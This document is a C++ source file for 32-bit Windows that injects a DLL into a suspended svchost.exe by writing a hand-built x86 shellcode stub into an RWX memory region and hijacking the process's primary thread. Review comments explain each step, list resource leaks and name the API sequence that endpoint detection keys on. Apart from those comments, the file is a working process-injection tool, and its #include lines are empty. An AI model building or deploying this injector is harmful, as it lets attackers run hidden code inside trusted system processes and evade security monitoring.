dll注入

// DllInjection.cpp : Defines the entry point for the console application.
//

#include 
#include 

#pragma comment(lib, "Shlwapi.lib")

// Payload image written verbatim into the child process by main().
// Field order matters: main() uses Buffer itself as the address of szPath
// (offset 0) and FIELD_OFFSET(SHELL_CODE, szInstruction) for the stub, so
// reordering or padding these members breaks the patched immediates.
typedef struct _SHELL_CODE
{
	char szPath[MAX_PATH];   // NUL-terminated path of the DLL the stub passes to LoadLibraryA
	char szInstruction[0x20];   // 32-byte slot for the x86 stub; main() copies 20 bytes (19 + terminator) into it
} SHELL_CODE, *PSHELL_CODE;

// Entry point of the injector. Starts svchost.exe suspended, copies a SHELL_CODE
// (DLL path + small x86 stub) into it with RWX permissions, points the primary
// thread's EAX at the stub and resumes it.
// 32-bit only: pointers are truncated to DWORD and CONTEXT.Eax does not exist
// in an x64 CONTEXT.
// Return: 0 on success, -1 if any Win32 call fails.
// NOTE(review): on every failure path after CreateProcess the child is left
// alive but suspended, and PI.hProcess / PI.hThread are never closed.
// Detection: CreateProcess(CREATE_SUSPENDED) + VirtualAllocEx(PAGE_EXECUTE_READWRITE)
// + WriteProcessMemory + SetThreadContext on the primary thread is the classic
// thread-hijack sequence that EDR/ETW telemetry keys on.
int main(int argc, CHAR* argv[])
{
	STARTUPINFO SI = {0};
	PROCESS_INFORMATION PI = {0};
	CONTEXT Context = {0};
	LPVOID Buffer = NULL;
	// Host process is hard-coded. TCHAR initialised from a narrow literal, so this
	// only compiles in a non-UNICODE build.
	TCHAR ApplicationName[MAX_PATH] = "C:\\Windows\\System32\\svchost.exe";
	
	SI.cb = sizeof(SI);
	// Create the host suspended so its primary thread has not yet executed any image code.
	if (!CreateProcess(ApplicationName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI,	&PI))
	{
		return -1;
	}
	
	// Read the integer registers of the suspended primary thread. The code below
	// relies on the x86 convention that EAX holds the image entry point at this stage.
	Context.ContextFlags = CONTEXT_INTEGER;
	if (!GetThreadContext(PI.hThread, &Context))
	{
		return -1;   // NOTE(review): child stays suspended; handles leak
	}
	
	CHAR szDllName[] = "C:\\Dlltest.dll";   // hard-coded DLL path, resolved inside the child
	// x86 stub, 19 bytes + terminator. The three imm32 fields are patched below:
	//   60          pushad
	//   68 imm32    push  <address of szPath in the child>   (patched at offset 2)
	//   b8 imm32    mov   eax, <LoadLibraryA>                (patched at offset 7)
	//   ff d0       call  eax
	//   61          popad
	//   e9 rel32    jmp   <original entry point>             (patched at offset 15)
	CHAR szShellCode[] = "\x60\x68\x12\x34\x56\x78\xb8\x12\x34\x56\x78\xff\xd0\x61\xe9\x12\x34\x56\x78";
	
	// Allocate one SHELL_CODE in the child. An RWX region in a foreign process is a
	// strong detection signal; nothing here ever frees it or drops the permission.
	Buffer = VirtualAllocEx(PI.hProcess, NULL, sizeof(SHELL_CODE), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (Buffer == NULL)
	{
		return -1;
	}
	
	// Patch the stub's immediates. Buffer == &szPath in the child because szPath is
	// the first struct member. LoadLibraryA is resolved in this process and assumed
	// to sit at the same address in the child (holds for a same-bitness child, since
	// kernel32 shares one base per boot). Unaligned DWORD stores through a char
	// array: tolerated on x86, undefined by the language standard.
	*(DWORD*)(szShellCode + 2) = (DWORD)Buffer;
	*(DWORD*)(szShellCode + 7) = (DWORD)LoadLibraryA;
	// rel32 for the trailing jmp: target (original EAX) minus the address of the byte
	// after the jmp, i.e. remote szInstruction + 19 (sizeof counts the terminator).
	*(DWORD*)(szShellCode + 15) = Context.Eax - (DWORD)((PUCHAR)Buffer + FIELD_OFFSET(SHELL_CODE, szInstruction) + sizeof(szShellCode) - 1);
	
	// NOTE(review): ShellCode is not zero-initialised, so the unused tails of szPath
	// and szInstruction carry uninitialised stack bytes into the child.
	// The (PSHELL_CODE)&ShellCode casts are no-ops.
	SHELL_CODE ShellCode;
	CopyMemory(((PSHELL_CODE)&ShellCode)->szPath, szDllName, sizeof(szDllName));
	CopyMemory(((PSHELL_CODE)&ShellCode)->szInstruction, szShellCode, sizeof(szShellCode));
	
	DWORD NumberOfBytesWritten = 0;
	// Copy the whole struct into the remote RWX region. NumberOfBytesWritten is
	// collected but never compared against sizeof(SHELL_CODE).
	if (!WriteProcessMemory(PI.hProcess, Buffer, &ShellCode, sizeof(SHELL_CODE), &NumberOfBytesWritten))
	{
		return -1;
	}
	
	// Redirect the primary thread to the stub. This is address arithmetic on the
	// remote pointer only; nothing is dereferenced locally.
	Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
	
	if (!SetThreadContext(PI.hThread, &Context))
	{
		return -1;
	}
	
	ResumeThread(PI.hThread);   // return value (previous suspend count, or -1 on failure) is ignored
	
	// NOTE(review): PI.hProcess and PI.hThread are never closed.
	return 0;
}

